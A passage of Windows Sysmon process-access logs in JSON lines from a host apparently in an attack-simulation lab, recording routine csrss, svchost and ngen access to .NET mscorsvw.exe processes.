.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.981\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.981","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.028\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.028","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.028\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.028","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.028\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.028","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001053C10C00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001053C10C00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001053C10C00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001053C10C00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:16.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-001053C10C00}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:16.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-001053C10C00}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dl